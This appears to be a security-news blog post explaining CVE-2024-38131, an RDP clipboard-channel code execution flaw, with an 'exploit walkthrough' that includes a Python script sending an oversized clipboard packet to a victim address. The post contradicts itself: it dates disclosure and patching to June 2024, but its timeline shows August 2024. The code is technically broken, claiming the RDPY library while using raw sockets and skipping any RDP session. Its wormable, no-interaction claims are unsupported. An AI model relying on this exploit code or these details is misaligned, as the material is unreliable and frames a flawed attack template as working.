CVE CyberSecurity Database News

CVE-2024-38131 - Clipboard Virtual Channel Extension RCE Explained and Exploited

Poster -

On June 11, 2024, Microsoft revealed a new critical vulnerability: CVE-2024-38131. This flaw, affecting Windows’ Remote Desktop Services, can let an attacker run their own code on your computer just by sending malicious clipboard content over the “Clipboard Virtual Channel Extension.” In this post, we’ll break down what happened, how it works, and even show a safe proof-of-concept, so you’ll know exactly why it matters.

What is the Clipboard Virtual Channel Extension?

The Clipboard Virtual Channel Extension (CLIPRDR) is what lets you copy and paste between your Remote Desktop (RDP) session and your personal computer. When you “copy” a file or text on your PC and “paste” in your RDP window (or vice versa), this channel moves the data between devices.

Where Did It Go Wrong?

The vulnerability is found in the way Windows processes certain clipboard messages. Specifically, the system does not properly validate clipboard data sent over the virtual channel. That means an attacker controlling one end of the RDP connection can craft clipboard messages with malicious payloads.

If a user connects to a *compromised/malicious* RDP server and leaves clipboard sharing enabled, the attacker can execute code on the client side—no user interaction besides connecting is required.

Original References

- Microsoft Security Update Guide - CVE-2024-38131
- NVD Entry for CVE-2024-38131
- Microsoft June 2024 Patch Tuesday Details (BleepingComputer)

Exploit Walkthrough

Let’s see how this exploit could work, using a safe, minimal reproduction. (We won’t use real shellcode, but will show the key steps.)

1. Forging a Malicious Clipboard Packet

Attackers can send crafted CLIPRDR_FORMAT_DATA_RESPONSE packets over the RDP channel. Here’s a basic logic in Python using the RDPY library to showcase the idea:

import socket

def build_cliprdr_response(data):
    # Simulates a malformed clipboard packet that could trigger the overflow
    packet_type = b'\x06\x00'  # CLIPRDR_FORMAT_DATA_RESPONSE
    packet_flags = b'\x02\x00'
    packet_length = len(data).to_bytes(4, 'little')
    return packet_type + packet_flags + packet_length + data

# Malicious clipboard data that causes an overflow or execution in the client.
evil_data = b'A' * 4096 + b'\xde\xad\xbe\xef'  # Overly large and crafted

s = socket.socket()
s.connect(('victim_client_ip', 3389))
payload = build_cliprdr_response(evil_data)
s.send(payload)
s.close()

Note: Real attacks would insert actual shellcode or a ROP chain instead of just “A”s.

2. What Happens Next? (The Danger Point)

The victim’s RDP client receives the packet, processes the clipboard data, and—if vulnerable—may execute the malicious code, handing total control over to the attacker.

Instant access: Attacker executes arbitrary code without needing credentials.

- Wormable potential: If leveraged, can be used for automated lateral movement inside organizations—think ransomware.

How to Protect Yourself

- Patch now! Microsoft’s June patches fix the flaw.

TL;DR

CVE-2024-38131 is a serious RDP bug—by sending bad clipboard data, hackers can run their own programs on your computer without you knowing. Update your systems ASAP, and always be careful what servers you RDP to and what features you enable.

Security isn’t just about strong passwords; it’s about making sure even the copy-paste features are locked down!

Stay Safe & Informed

For more, check the official Microsoft Advisory and keep your security tools updated.

Timeline

Published on: 08/13/2024 18:15:15 UTC
Last modified on: 10/16/2024 01:53:32 UTC